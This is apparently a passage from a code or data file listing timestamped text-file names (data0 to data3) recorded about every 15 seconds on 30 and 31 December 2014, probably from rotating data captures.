'data2Tue_Dec_30_21_57_51_2014.txt',
'data2Tue_Dec_30_21_58_06_2014.txt',
'data2Tue_Dec_30_21_58_21_2014.txt',
'data2Tue_Dec_30_21_58_35_2014.txt',
'data2Tue_Dec_30_21_58_50_2014.txt',
'data2Tue_Dec_30_21_59_05_2014.txt',
'data2Tue_Dec_30_21_59_20_2014.txt',
'data2Tue_Dec_30_21_59_34_2014.txt',
'data2Tue_Dec_30_21_59_50_2014.txt',
'data2Tue_Dec_30_22_00_05_2014.txt',
'data2Tue_Dec_30_22_00_19_2014.txt',
'data2Tue_Dec_30_22_00_34_2014.txt',
'data2Tue_Dec_30_22_00_49_2014.txt',
'data2Tue_Dec_30_22_01_03_2014.txt',
'data2Tue_Dec_30_22_01_18_2014.txt',
'data2Tue_Dec_30_22_01_33_2014.txt',
'data2Tue_Dec_30_22_01_48_2014.txt',
'data2Tue_Dec_30_22_02_03_2014.txt',
'data2Tue_Dec_30_22_02_18_2014.txt',
'data2Tue_Dec_30_22_02_32_2014.txt',
'data2Tue_Dec_30_22_02_47_2014.txt',
'data2Tue_Dec_30_22_03_02_2014.txt',
'data2Tue_Dec_30_22_03_17_2014.txt',
'data2Tue_Dec_30_22_03_31_2014.txt',
'data2Tue_Dec_30_22_03_46_2014.txt',
'data2Tue_Dec_30_22_04_01_2014.txt',
'data2Tue_Dec_30_22_04_15_2014.txt',
'data2Tue_Dec_30_22_04_30_2014.txt',
'data2Tue_Dec_30_22_04_45_2014.txt',
'data3Tue_Dec_30_22_05_00_2014.txt',
'data3Tue_Dec_30_22_05_15_2014.txt',
'data3Tue_Dec_30_22_05_30_2014.txt',
'data3Tue_Dec_30_22_05_44_2014.txt',
'data3Tue_Dec_30_22_06_00_2014.txt',
'data3Tue_Dec_30_22_06_14_2014.txt',
'data3Tue_Dec_30_22_06_29_2014.txt',
'data3Tue_Dec_30_22_06_44_2014.txt',
'data3Tue_Dec_30_22_06_59_2014.txt',
'data3Tue_Dec_30_22_07_14_2014.txt',
'data3Tue_Dec_30_22_07_29_2014.txt',
'data3Tue_Dec_30_22_07_43_2014.txt',
'data3Tue_Dec_30_22_07_58_2014.txt',
'data3Tue_Dec_30_22_08_13_2014.txt',
'data3Tue_Dec_30_22_08_28_2014.txt',
'data3Tue_Dec_30_22_08_43_2014.txt',
'data3Tue_Dec_30_22_08_57_2014.txt',
'data3Tue_Dec_30_22_09_12_2014.txt',
'data3Tue_Dec_30_22_09_27_2014.txt',
'data3Tue_Dec_30_22_09_42_2014.txt',
'data3Tue_Dec_30_22_09_57_2014.txt',
'data3Tue_Dec_30_22_10_12_2014.txt',
'data3Tue_Dec_30_22_10_26_2014.txt',
'data3Tue_Dec_30_22_10_41_2014.txt',
'data3Tue_Dec_30_22_10_56_2014.txt',
'data3Tue_Dec_30_22_11_11_2014.txt',
'data3Tue_Dec_30_22_11_25_2014.txt',
'data3Tue_Dec_30_22_11_41_2014.txt',
'data3Tue_Dec_30_22_11_56_2014.txt',
'data3Tue_Dec_30_22_12_11_2014.txt',
'data3Tue_Dec_30_22_12_26_2014.txt',
'data3Tue_Dec_30_22_12_40_2014.txt',
'data3Tue_Dec_30_22_12_55_2014.txt',
'data3Tue_Dec_30_22_13_10_2014.txt',
'data3Tue_Dec_30_22_13_25_2014.txt',
'data3Tue_Dec_30_22_13_40_2014.txt',
'data3Tue_Dec_30_22_13_55_2014.txt',
'data3Tue_Dec_30_22_14_09_2014.txt',
'data3Tue_Dec_30_22_14_24_2014.txt',
'data3Tue_Dec_30_22_14_39_2014.txt',
'data3Tue_Dec_30_22_14_53_2014.txt',
'data3Tue_Dec_30_22_15_08_2014.txt',
'data3Tue_Dec_30_22_15_23_2014.txt',
'data3Tue_Dec_30_22_15_37_2014.txt',
'data3Tue_Dec_30_22_15_52_2014.txt',
'data3Tue_Dec_30_22_16_07_2014.txt',
'data3Tue_Dec_30_22_16_22_2014.txt',
'data3Tue_Dec_30_22_16_36_2014.txt',
'data3Tue_Dec_30_22_16_51_2014.txt',
'data3Tue_Dec_30_22_17_06_2014.txt',
'data0Tue_Dec_30_22_17_47_2014.txt',
'data0Tue_Dec_30_22_18_01_2014.txt',
'data0Tue_Dec_30_22_18_16_2014.txt',
'data0Tue_Dec_30_22_18_31_2014.txt',
'data0Tue_Dec_30_22_18_46_2014.txt',
'data0Tue_Dec_30_22_19_01_2014.txt',
'data0Tue_Dec_30_22_19_15_2014.txt',
'data0Tue_Dec_30_22_19_30_2014.txt',
'data0Tue_Dec_30_22_19_45_2014.txt',
'data0Tue_Dec_30_22_20_00_2014.txt',
'data0Tue_Dec_30_22_20_15_2014.txt',
'data0Tue_Dec_30_22_20_30_2014.txt',
'data0Tue_Dec_30_22_20_44_2014.txt',
'data0Tue_Dec_30_22_20_59_2014.txt',
'data0Tue_Dec_30_22_21_14_2014.txt',
'data0Tue_Dec_30_22_21_29_2014.txt',
'data0Tue_Dec_30_22_21_44_2014.txt',
'data0Tue_Dec_30_22_21_58_2014.txt',
'data0Tue_Dec_30_22_22_13_2014.txt',
'data0Tue_Dec_30_22_22_28_2014.txt',
'data0Tue_Dec_30_22_22_43_2014.txt',
'data0Tue_Dec_30_22_22_58_2014.txt',
'data0Tue_Dec_30_22_23_12_2014.txt',
'data0Tue_Dec_30_22_23_27_2014.txt',
'data0Tue_Dec_30_22_23_42_2014.txt',
'data0Tue_Dec_30_22_23_57_2014.txt',
'data0Tue_Dec_30_22_24_12_2014.txt',
'data0Tue_Dec_30_22_24_26_2014.txt',
'data0Tue_Dec_30_22_24_41_2014.txt',
'data0Tue_Dec_30_22_24_56_2014.txt',
'data0Tue_Dec_30_22_25_11_2014.txt',
'data0Tue_Dec_30_22_25_25_2014.txt',
'data0Tue_Dec_30_22_25_41_2014.txt',
'data0Tue_Dec_30_22_25_55_2014.txt',
'data0Tue_Dec_30_22_26_10_2014.txt',
'data0Tue_Dec_30_22_26_25_2014.txt',
'data0Tue_Dec_30_22_26_39_2014.txt',
'data0Tue_Dec_30_22_26_54_2014.txt',
'data0Tue_Dec_30_22_27_09_2014.txt',
'data0Tue_Dec_30_22_27_24_2014.txt',
'data0Tue_Dec_30_22_27_39_2014.txt',
'data0Tue_Dec_30_22_27_54_2014.txt',
'data0Tue_Dec_30_22_28_09_2014.txt',
'data0Tue_Dec_30_22_28_23_2014.txt',
'data0Tue_Dec_30_22_28_38_2014.txt',
'data0Tue_Dec_30_22_28_53_2014.txt',
'data0Tue_Dec_30_22_29_08_2014.txt',
'data0Tue_Dec_30_22_29_23_2014.txt',
'data0Tue_Dec_30_22_29_37_2014.txt',
'data0Tue_Dec_30_22_29_52_2014.txt',
'data1Tue_Dec_30_22_30_07_2014.txt',
'data1Tue_Dec_30_22_30_21_2014.txt',
'data1Tue_Dec_30_22_30_36_2014.txt',
'data1Tue_Dec_30_22_30_51_2014.txt',
'data1Tue_Dec_30_22_31_06_2014.txt',
'data1Tue_Dec_30_22_31_20_2014.txt',
'data1Tue_Dec_30_22_31_35_2014.txt',
'data1Tue_Dec_30_22_31_49_2014.txt',
'data1Tue_Dec_30_22_32_04_2014.txt',
'data1Tue_Dec_30_22_32_19_2014.txt',
'data1Tue_Dec_30_22_32_34_2014.txt',
'data1Tue_Dec_30_22_32_48_2014.txt',
'data1Tue_Dec_30_22_33_03_2014.txt',
'data1Tue_Dec_30_22_33_18_2014.txt',
'data1Tue_Dec_30_22_33_33_2014.txt',
'data1Tue_Dec_30_22_33_48_2014.txt',
'data1Tue_Dec_30_22_34_03_2014.txt',
'data1Tue_Dec_30_22_34_17_2014.txt',
'data1Tue_Dec_30_22_34_32_2014.txt',
'data1Tue_Dec_30_22_34_47_2014.txt',
'data1Tue_Dec_30_22_35_01_2014.txt',
'data1Tue_Dec_30_22_35_16_2014.txt',
'data1Tue_Dec_30_22_35_31_2014.txt',
'data1Tue_Dec_30_22_35_46_2014.txt',
'data1Tue_Dec_30_22_36_01_2014.txt',
'data1Tue_Dec_30_22_36_16_2014.txt',
'data1Tue_Dec_30_22_36_30_2014.txt',
'data1Tue_Dec_30_22_36_45_2014.txt',
'data1Tue_Dec_30_22_37_00_2014.txt',
'data1Tue_Dec_30_22_37_15_2014.txt',
'data1Tue_Dec_30_22_37_30_2014.txt',
'data1Tue_Dec_30_22_37_44_2014.txt',
'data1Tue_Dec_30_22_37_59_2014.txt',
'data1Tue_Dec_30_22_38_14_2014.txt',
'data1Tue_Dec_30_22_38_28_2014.txt',
'data1Tue_Dec_30_22_38_44_2014.txt',
'data1Tue_Dec_30_22_38_58_2014.txt',
'data1Tue_Dec_30_22_39_13_2014.txt',
'data1Tue_Dec_30_22_39_28_2014.txt',
'data1Tue_Dec_30_22_39_42_2014.txt',
'data1Tue_Dec_30_22_39_57_2014.txt',
'data1Tue_Dec_30_22_40_13_2014.txt',
'data1Tue_Dec_30_22_40_27_2014.txt',
'data1Tue_Dec_30_22_40_41_2014.txt',
'data1Tue_Dec_30_22_40_56_2014.txt',
'data1Tue_Dec_30_22_41_11_2014.txt',
'data1Tue_Dec_30_22_41_26_2014.txt',
'data1Tue_Dec_30_22_41_41_2014.txt',
'data1Tue_Dec_30_22_41_56_2014.txt',
'data1Tue_Dec_30_22_42_10_2014.txt',
'data2Tue_Dec_30_22_42_25_2014.txt',
'data2Tue_Dec_30_22_42_40_2014.txt',
'data2Tue_Dec_30_22_42_54_2014.txt',
'data2Tue_Dec_30_22_43_09_2014.txt',
'data2Tue_Dec_30_22_43_24_2014.txt',
'data2Tue_Dec_30_22_43_39_2014.txt',
'data2Tue_Dec_30_22_43_53_2014.txt',
'data2Tue_Dec_30_22_44_08_2014.txt',
'data2Tue_Dec_30_22_44_23_2014.txt',
'data2Tue_Dec_30_22_44_37_2014.txt',
'data2Tue_Dec_30_22_44_52_2014.txt',
'data2Tue_Dec_30_22_45_06_2014.txt',
'data2Tue_Dec_30_22_45_21_2014.txt',
'data2Tue_Dec_30_22_45_36_2014.txt',
'data2Tue_Dec_30_22_45_50_2014.txt',
'data2Tue_Dec_30_22_46_05_2014.txt',
'data2Tue_Dec_30_22_46_20_2014.txt',
'data2Tue_Dec_30_22_46_35_2014.txt',
'data2Tue_Dec_30_22_46_50_2014.txt',
'data2Tue_Dec_30_22_47_05_2014.txt',
'data2Tue_Dec_30_22_47_20_2014.txt',
'data2Tue_Dec_30_22_47_35_2014.txt',
'data2Tue_Dec_30_22_47_49_2014.txt',
'data2Tue_Dec_30_22_48_04_2014.txt',
'data2Tue_Dec_30_22_48_19_2014.txt',
'data2Tue_Dec_30_22_48_34_2014.txt',
'data2Tue_Dec_30_22_48_49_2014.txt',
'data2Tue_Dec_30_22_49_04_2014.txt',
'data2Tue_Dec_30_22_49_19_2014.txt',
'data2Tue_Dec_30_22_49_34_2014.txt',
'data2Tue_Dec_30_22_49_49_2014.txt',
'data2Tue_Dec_30_22_50_04_2014.txt',
'data2Tue_Dec_30_22_50_19_2014.txt',
'data2Tue_Dec_30_22_50_33_2014.txt',
'data2Tue_Dec_30_22_50_48_2014.txt',
'data2Tue_Dec_30_22_51_03_2014.txt',
'data2Tue_Dec_30_22_51_18_2014.txt',
'data2Tue_Dec_30_22_51_32_2014.txt',
'data2Tue_Dec_30_22_51_47_2014.txt',
'data2Tue_Dec_30_22_52_02_2014.txt',
'data2Tue_Dec_30_22_52_16_2014.txt',
'data2Tue_Dec_30_22_52_31_2014.txt',
'data2Tue_Dec_30_22_52_46_2014.txt',
'data2Tue_Dec_30_22_53_01_2014.txt',
'data2Tue_Dec_30_22_53_16_2014.txt',
'data2Tue_Dec_30_22_53_31_2014.txt',
'data2Tue_Dec_30_22_53_45_2014.txt',
'data2Tue_Dec_30_22_54_00_2014.txt',
'data2Tue_Dec_30_22_54_15_2014.txt',
'data2Tue_Dec_30_22_54_29_2014.txt',
'data3Tue_Dec_30_22_54_44_2014.txt',
'data3Tue_Dec_30_22_54_59_2014.txt',
'data3Tue_Dec_30_22_55_13_2014.txt',
'data3Tue_Dec_30_22_55_28_2014.txt',
'data3Tue_Dec_30_22_55_43_2014.txt',
'data3Tue_Dec_30_22_55_58_2014.txt',
'data3Tue_Dec_30_22_56_13_2014.txt',
'data3Tue_Dec_30_22_56_28_2014.txt',
'data3Tue_Dec_30_22_56_43_2014.txt',
'data3Tue_Dec_30_22_56_57_2014.txt',
'data3Tue_Dec_30_22_57_12_2014.txt',
'data3Tue_Dec_30_22_57_27_2014.txt',
'data3Tue_Dec_30_22_57_42_2014.txt',
'data3Tue_Dec_30_22_57_56_2014.txt',
'data3Tue_Dec_30_22_58_12_2014.txt',
'data3Tue_Dec_30_22_58_26_2014.txt',
'data3Tue_Dec_30_22_58_41_2014.txt',
'data3Tue_Dec_30_22_58_56_2014.txt',
'data3Tue_Dec_30_22_59_10_2014.txt',
'data3Tue_Dec_30_22_59_25_2014.txt',
'data3Tue_Dec_30_22_59_40_2014.txt',
'data3Tue_Dec_30_22_59_54_2014.txt',
'data3Tue_Dec_30_23_00_10_2014.txt',
'data3Tue_Dec_30_23_00_25_2014.txt',
'data3Tue_Dec_30_23_00_39_2014.txt',
'data3Tue_Dec_30_23_00_54_2014.txt',
'data3Tue_Dec_30_23_01_09_2014.txt',
'data3Tue_Dec_30_23_01_23_2014.txt',
'data3Tue_Dec_30_23_01_38_2014.txt',
'data3Tue_Dec_30_23_01_53_2014.txt',
'data3Tue_Dec_30_23_02_07_2014.txt',
'data3Tue_Dec_30_23_02_22_2014.txt',
'data3Tue_Dec_30_23_02_37_2014.txt',
'data3Tue_Dec_30_23_02_52_2014.txt',
'data3Tue_Dec_30_23_03_06_2014.txt',
'data3Tue_Dec_30_23_03_21_2014.txt',
'data3Tue_Dec_30_23_03_36_2014.txt',
'data3Tue_Dec_30_23_03_51_2014.txt',
'data3Tue_Dec_30_23_04_05_2014.txt',
'data3Tue_Dec_30_23_04_20_2014.txt',
'data3Tue_Dec_30_23_04_34_2014.txt',
'data3Tue_Dec_30_23_04_49_2014.txt',
'data3Tue_Dec_30_23_05_04_2014.txt',
'data3Tue_Dec_30_23_05_19_2014.txt',
'data3Tue_Dec_30_23_05_34_2014.txt',
'data3Tue_Dec_30_23_05_49_2014.txt',
'data3Tue_Dec_30_23_06_04_2014.txt',
'data3Tue_Dec_30_23_06_18_2014.txt',
'data3Tue_Dec_30_23_06_33_2014.txt',
'data3Tue_Dec_30_23_06_48_2014.txt',
'data0Tue_Dec_30_23_07_28_2014.txt',
'data0Tue_Dec_30_23_07_42_2014.txt',
'data0Tue_Dec_30_23_07_58_2014.txt',
'data0Tue_Dec_30_23_08_12_2014.txt',
'data0Tue_Dec_30_23_08_27_2014.txt',
'data0Tue_Dec_30_23_08_42_2014.txt',
'data0Tue_Dec_30_23_08_57_2014.txt',
'data0Tue_Dec_30_23_09_12_2014.txt',
'data0Tue_Dec_30_23_09_27_2014.txt',
'data0Tue_Dec_30_23_09_42_2014.txt',
'data0Tue_Dec_30_23_09_57_2014.txt',
'data0Tue_Dec_30_23_10_12_2014.txt',
'data0Tue_Dec_30_23_10_26_2014.txt',
'data0Tue_Dec_30_23_10_42_2014.txt',
'data0Tue_Dec_30_23_10_57_2014.txt',
'data0Tue_Dec_30_23_11_12_2014.txt',
'data0Tue_Dec_30_23_11_27_2014.txt',
'data0Tue_Dec_30_23_11_42_2014.txt',
'data0Tue_Dec_30_23_11_56_2014.txt',
'data0Tue_Dec_30_23_12_11_2014.txt',
'data0Tue_Dec_30_23_12_26_2014.txt',
'data0Tue_Dec_30_23_12_40_2014.txt',
'data0Tue_Dec_30_23_12_55_2014.txt',
'data0Tue_Dec_30_23_13_10_2014.txt',
'data0Tue_Dec_30_23_13_25_2014.txt',
'data0Tue_Dec_30_23_13_40_2014.txt',
'data0Tue_Dec_30_23_13_55_2014.txt',
'data0Tue_Dec_30_23_14_11_2014.txt',
'data0Tue_Dec_30_23_14_26_2014.txt',
'data0Tue_Dec_30_23_14_40_2014.txt',
'data0Tue_Dec_30_23_14_55_2014.txt',
'data0Tue_Dec_30_23_15_09_2014.txt',
'data0Tue_Dec_30_23_15_24_2014.txt',
'data0Tue_Dec_30_23_15_39_2014.txt',
'data0Tue_Dec_30_23_15_54_2014.txt',
'data0Tue_Dec_30_23_16_08_2014.txt',
'data0Tue_Dec_30_23_16_23_2014.txt',
'data0Tue_Dec_30_23_16_37_2014.txt',
'data0Tue_Dec_30_23_16_52_2014.txt',
'data0Tue_Dec_30_23_17_08_2014.txt',
'data0Tue_Dec_30_23_17_23_2014.txt',
'data0Tue_Dec_30_23_17_37_2014.txt',
'data0Tue_Dec_30_23_17_52_2014.txt',
'data0Tue_Dec_30_23_18_07_2014.txt',
'data0Tue_Dec_30_23_18_22_2014.txt',
'data0Tue_Dec_30_23_18_36_2014.txt',
'data0Tue_Dec_30_23_18_51_2014.txt',
'data0Tue_Dec_30_23_19_06_2014.txt',
'data0Tue_Dec_30_23_19_21_2014.txt',
'data0Tue_Dec_30_23_19_36_2014.txt',
'data1Tue_Dec_30_23_19_50_2014.txt',
'data1Tue_Dec_30_23_20_05_2014.txt',
'data1Tue_Dec_30_23_20_20_2014.txt',
'data1Tue_Dec_30_23_20_34_2014.txt',
'data1Tue_Dec_30_23_20_49_2014.txt',
'data1Tue_Dec_30_23_21_04_2014.txt',
'data1Tue_Dec_30_23_21_19_2014.txt',
'data1Tue_Dec_30_23_21_33_2014.txt',
'data1Tue_Dec_30_23_21_48_2014.txt',
'data1Tue_Dec_30_23_22_03_2014.txt',
'data1Tue_Dec_30_23_22_18_2014.txt',
'data1Tue_Dec_30_23_22_33_2014.txt',
'data1Tue_Dec_30_23_22_48_2014.txt',
'data1Tue_Dec_30_23_23_03_2014.txt',
'data1Tue_Dec_30_23_23_17_2014.txt',
'data1Tue_Dec_30_23_23_32_2014.txt',
'data1Tue_Dec_30_23_23_47_2014.txt',
'data1Tue_Dec_30_23_24_02_2014.txt',
'data1Tue_Dec_30_23_24_16_2014.txt',
'data1Tue_Dec_30_23_24_31_2014.txt',
'data1Tue_Dec_30_23_24_45_2014.txt',
'data1Tue_Dec_30_23_25_00_2014.txt',
'data1Tue_Dec_30_23_25_15_2014.txt',
'data1Tue_Dec_30_23_25_29_2014.txt',
'data1Tue_Dec_30_23_25_44_2014.txt',
'data1Tue_Dec_30_23_25_59_2014.txt',
'data1Tue_Dec_30_23_26_13_2014.txt',
'data1Tue_Dec_30_23_26_28_2014.txt',
'data1Tue_Dec_30_23_26_43_2014.txt',
'data1Tue_Dec_30_23_26_58_2014.txt',
'data1Tue_Dec_30_23_27_13_2014.txt',
'data1Tue_Dec_30_23_27_27_2014.txt',
'data1Tue_Dec_30_23_27_42_2014.txt',
'data1Tue_Dec_30_23_27_57_2014.txt',
'data1Tue_Dec_30_23_28_11_2014.txt',
'data1Tue_Dec_30_23_28_26_2014.txt',
'data1Tue_Dec_30_23_28_42_2014.txt',
'data1Tue_Dec_30_23_28_56_2014.txt',
'data1Tue_Dec_30_23_29_11_2014.txt',
'data1Tue_Dec_30_23_29_26_2014.txt',
'data1Tue_Dec_30_23_29_41_2014.txt',
'data1Tue_Dec_30_23_29_56_2014.txt',
'data1Tue_Dec_30_23_30_10_2014.txt',
'data1Tue_Dec_30_23_30_25_2014.txt',
'data1Tue_Dec_30_23_30_40_2014.txt',
'data1Tue_Dec_30_23_30_55_2014.txt',
'data1Tue_Dec_30_23_31_10_2014.txt',
'data1Tue_Dec_30_23_31_25_2014.txt',
'data1Tue_Dec_30_23_31_39_2014.txt',
'data1Tue_Dec_30_23_31_54_2014.txt',
'data2Tue_Dec_30_23_32_09_2014.txt',
'data2Tue_Dec_30_23_32_24_2014.txt',
'data2Tue_Dec_30_23_32_39_2014.txt',
'data2Tue_Dec_30_23_32_53_2014.txt',
'data2Tue_Dec_30_23_33_08_2014.txt',
'data2Tue_Dec_30_23_33_23_2014.txt',
'data2Tue_Dec_30_23_33_38_2014.txt',
'data2Tue_Dec_30_23_33_53_2014.txt',
'data2Tue_Dec_30_23_34_08_2014.txt',
'data2Tue_Dec_30_23_34_23_2014.txt',
'data2Tue_Dec_30_23_34_37_2014.txt',
'data2Tue_Dec_30_23_34_52_2014.txt',
'data2Tue_Dec_30_23_35_07_2014.txt',
'data2Tue_Dec_30_23_35_22_2014.txt',
'data2Tue_Dec_30_23_35_37_2014.txt',
'data2Tue_Dec_30_23_35_52_2014.txt',
'data2Tue_Dec_30_23_36_07_2014.txt',
'data2Tue_Dec_30_23_36_22_2014.txt',
'data2Tue_Dec_30_23_36_36_2014.txt',
'data2Tue_Dec_30_23_36_51_2014.txt',
'data2Tue_Dec_30_23_37_06_2014.txt',
'data2Tue_Dec_30_23_37_20_2014.txt',
'data2Tue_Dec_30_23_37_35_2014.txt',
'data2Tue_Dec_30_23_37_50_2014.txt',
'data2Tue_Dec_30_23_38_05_2014.txt',
'data2Tue_Dec_30_23_38_20_2014.txt',
'data2Tue_Dec_30_23_38_35_2014.txt',
'data2Tue_Dec_30_23_38_50_2014.txt',
'data2Tue_Dec_30_23_39_05_2014.txt',
'data2Tue_Dec_30_23_39_19_2014.txt',
'data2Tue_Dec_30_23_39_34_2014.txt',
'data2Tue_Dec_30_23_39_49_2014.txt',
'data2Tue_Dec_30_23_40_04_2014.txt',
'data2Tue_Dec_30_23_40_18_2014.txt',
'data2Tue_Dec_30_23_40_33_2014.txt',
'data2Tue_Dec_30_23_40_48_2014.txt',
'data2Tue_Dec_30_23_41_03_2014.txt',
'data2Tue_Dec_30_23_41_18_2014.txt',
'data2Tue_Dec_30_23_41_33_2014.txt',
'data2Tue_Dec_30_23_41_48_2014.txt',
'data2Tue_Dec_30_23_42_03_2014.txt',
'data2Tue_Dec_30_23_42_18_2014.txt',
'data2Tue_Dec_30_23_42_33_2014.txt',
'data2Tue_Dec_30_23_42_47_2014.txt',
'data2Tue_Dec_30_23_43_02_2014.txt',
'data2Tue_Dec_30_23_43_18_2014.txt',
'data2Tue_Dec_30_23_43_33_2014.txt',
'data2Tue_Dec_30_23_43_47_2014.txt',
'data2Tue_Dec_30_23_44_02_2014.txt',
'data2Tue_Dec_30_23_44_17_2014.txt',
'data3Tue_Dec_30_23_44_32_2014.txt',
'data3Tue_Dec_30_23_44_46_2014.txt',
'data3Tue_Dec_30_23_45_01_2014.txt',
'data3Tue_Dec_30_23_45_16_2014.txt',
'data3Tue_Dec_30_23_45_31_2014.txt',
'data3Tue_Dec_30_23_45_46_2014.txt',
'data3Tue_Dec_30_23_46_00_2014.txt',
'data3Tue_Dec_30_23_46_16_2014.txt',
'data3Tue_Dec_30_23_46_31_2014.txt',
'data3Tue_Dec_30_23_46_46_2014.txt',
'data3Tue_Dec_30_23_47_01_2014.txt',
'data3Tue_Dec_30_23_47_16_2014.txt',
'data3Tue_Dec_30_23_47_31_2014.txt',
'data3Tue_Dec_30_23_47_46_2014.txt',
'data3Tue_Dec_30_23_48_01_2014.txt',
'data3Tue_Dec_30_23_48_16_2014.txt',
'data3Tue_Dec_30_23_48_31_2014.txt',
'data3Tue_Dec_30_23_48_45_2014.txt',
'data3Tue_Dec_30_23_49_00_2014.txt',
'data3Tue_Dec_30_23_49_15_2014.txt',
'data3Tue_Dec_30_23_49_30_2014.txt',
'data3Tue_Dec_30_23_49_45_2014.txt',
'data3Tue_Dec_30_23_49_59_2014.txt',
'data3Tue_Dec_30_23_50_14_2014.txt',
'data3Tue_Dec_30_23_50_29_2014.txt',
'data3Tue_Dec_30_23_50_44_2014.txt',
'data3Tue_Dec_30_23_50_59_2014.txt',
'data3Tue_Dec_30_23_51_13_2014.txt',
'data3Tue_Dec_30_23_51_28_2014.txt',
'data3Tue_Dec_30_23_51_43_2014.txt',
'data3Tue_Dec_30_23_51_57_2014.txt',
'data3Tue_Dec_30_23_52_13_2014.txt',
'data3Tue_Dec_30_23_52_28_2014.txt',
'data3Tue_Dec_30_23_52_43_2014.txt',
'data3Tue_Dec_30_23_52_58_2014.txt',
'data3Tue_Dec_30_23_53_12_2014.txt',
'data3Tue_Dec_30_23_53_27_2014.txt',
'data3Tue_Dec_30_23_53_42_2014.txt',
'data3Tue_Dec_30_23_53_56_2014.txt',
'data3Tue_Dec_30_23_54_11_2014.txt',
'data3Tue_Dec_30_23_54_26_2014.txt',
'data3Tue_Dec_30_23_54_41_2014.txt',
'data3Tue_Dec_30_23_54_56_2014.txt',
'data3Tue_Dec_30_23_55_11_2014.txt',
'data3Tue_Dec_30_23_55_26_2014.txt',
'data3Tue_Dec_30_23_55_41_2014.txt',
'data3Tue_Dec_30_23_55_55_2014.txt',
'data3Tue_Dec_30_23_56_10_2014.txt',
'data3Tue_Dec_30_23_56_25_2014.txt',
'data3Tue_Dec_30_23_56_40_2014.txt',
'data0Tue_Dec_30_23_57_21_2014.txt',
'data0Tue_Dec_30_23_57_36_2014.txt',
'data0Tue_Dec_30_23_57_51_2014.txt',
'data0Tue_Dec_30_23_58_06_2014.txt',
'data0Tue_Dec_30_23_58_20_2014.txt',
'data0Tue_Dec_30_23_58_35_2014.txt',
'data0Tue_Dec_30_23_58_50_2014.txt',
'data0Tue_Dec_30_23_59_05_2014.txt',
'data0Tue_Dec_30_23_59_20_2014.txt',
'data0Tue_Dec_30_23_59_35_2014.txt',
'data0Tue_Dec_30_23_59_49_2014.txt',
'data0Wed_Dec_31_00_00_04_2014.txt',
'data0Wed_Dec_31_00_00_18_2014.txt',
'data0Wed_Dec_31_00_00_33_2014.txt',
'data0Wed_Dec_31_00_00_48_2014.txt',
'data0Wed_Dec_31_00_01_02_2014.txt',
'data0Wed_Dec_31_00_01_17_2014.txt',
'data0Wed_Dec_31_00_01_32_2014.txt',
'data0Wed_Dec_31_00_01_48_2014.txt',
'data0Wed_Dec_31_00_02_02_2014.txt',
'data0Wed_Dec_31_00_02_18_2014.txt',
'data0Wed_Dec_31_00_02_32_2014.txt',
'data0Wed_Dec_31_00_02_47_2014.txt',
'data0Wed_Dec_31_00_03_01_2014.txt',
'data0Wed_Dec_31_00_03_17_2014.txt',
'data0Wed_Dec_31_00_03_32_2014.txt',
'data0Wed_Dec_31_00_03_46_2014.txt',
'data0Wed_Dec_31_00_04_01_2014.txt',
'data0Wed_Dec_31_00_04_16_2014.txt',
'data0Wed_Dec_31_00_04_31_2014.txt',
'data0Wed_Dec_31_00_04_46_2014.txt',
'data0Wed_Dec_31_00_05_00_2014.txt',
'data0Wed_Dec_31_00_05_15_2014.txt',
'data0Wed_Dec_31_00_05_31_2014.txt',
'data0Wed_Dec_31_00_05_46_2014.txt',
'data0Wed_Dec_31_00_06_01_2014.txt',
'data0Wed_Dec_31_00_06_15_2014.txt',
'data0Wed_Dec_31_00_06_30_2014.txt',
'data0Wed_Dec_31_00_06_45_2014.txt',
'data0Wed_Dec_31_00_07_00_2014.txt',
'data0Wed_Dec_31_00_07_14_2014.txt',
'data0Wed_Dec_31_00_07_29_2014.txt',
'data0Wed_Dec_31_00_07_44_2014.txt',
'data0Wed_Dec_31_00_07_59_2014.txt',
'data0Wed_Dec_31_00_08_13_2014.txt',
'data0Wed_Dec_31_00_08_28_2014.txt',
'data0Wed_Dec_31_00_08_43_2014.txt',
'data0Wed_Dec_31_00_08_57_2014.txt',
'data0Wed_Dec_31_00_09_12_2014.txt',
'data0Wed_Dec_31_00_09_27_2014.txt',
'data1Wed_Dec_31_00_09_42_2014.txt',
'data1Wed_Dec_31_00_09_57_2014.txt',
'data1Wed_Dec_31_00_10_11_2014.txt',
'data1Wed_Dec_31_00_10_26_2014.txt',
'data1Wed_Dec_31_00_10_41_2014.txt',
'data1Wed_Dec_31_00_10_56_2014.txt',
'data1Wed_Dec_31_00_11_11_2014.txt',
'data1Wed_Dec_31_00_11_26_2014.txt',
'data1Wed_Dec_31_00_11_40_2014.txt',
'data1Wed_Dec_31_00_11_55_2014.txt',
'data1Wed_Dec_31_00_12_10_2014.txt',
'data1Wed_Dec_31_00_12_25_2014.txt',
'data1Wed_Dec_31_00_12_40_2014.txt',
'data1Wed_Dec_31_00_12_54_2014.txt',
'data1Wed_Dec_31_00_13_09_2014.txt',
'data1Wed_Dec_31_00_13_24_2014.txt',
'data1Wed_Dec_31_00_13_39_2014.txt',
'data1Wed_Dec_31_00_13_54_2014.txt',
'data1Wed_Dec_31_00_14_09_2014.txt',
'data1Wed_Dec_31_00_14_24_2014.txt',
'data1Wed_Dec_31_00_14_38_2014.txt',
'data1Wed_Dec_31_00_14_53_2014.txt',
'data1Wed_Dec_31_00_15_07_2014.txt',
'data1Wed_Dec_31_00_15_22_2014.txt',
'data1Wed_Dec_31_00_15_37_2014.txt',
'data1Wed_Dec_31_00_15_52_2014.txt',
'data1Wed_Dec_31_00_16_06_2014.txt',
'data1Wed_Dec_31_00_16_22_2014.txt',
'data1Wed_Dec_31_00_16_38_2014.txt',
'data1Wed_Dec_31_00_16_52_2014.txt',
'data1Wed_Dec_31_00_17_07_2014.txt',
'data1Wed_Dec_31_00_17_22_2014.txt',
'data1Wed_Dec_31_00_17_37_2014.txt',
'data1Wed_Dec_31_00_17_51_2014.txt',
'data1Wed_Dec_31_00_18_06_2014.txt',
'data1Wed_Dec_31_00_18_20_2014.txt',
'data1Wed_Dec_31_00_18_35_2014.txt',
'data1Wed_Dec_31_00_18_50_2014.txt',
'data1Wed_Dec_31_00_19_04_2014.txt',
'data1Wed_Dec_31_00_19_19_2014.txt',
'data1Wed_Dec_31_00_19_34_2014.txt',
'data1Wed_Dec_31_00_19_48_2014.txt',
'data1Wed_Dec_31_00_20_03_2014.txt',
'data1Wed_Dec_31_00_20_18_2014.txt',
'data1Wed_Dec_31_00_20_33_2014.txt',
'data1Wed_Dec_31_00_20_48_2014.txt',
'data1Wed_Dec_31_00_21_03_2014.txt',
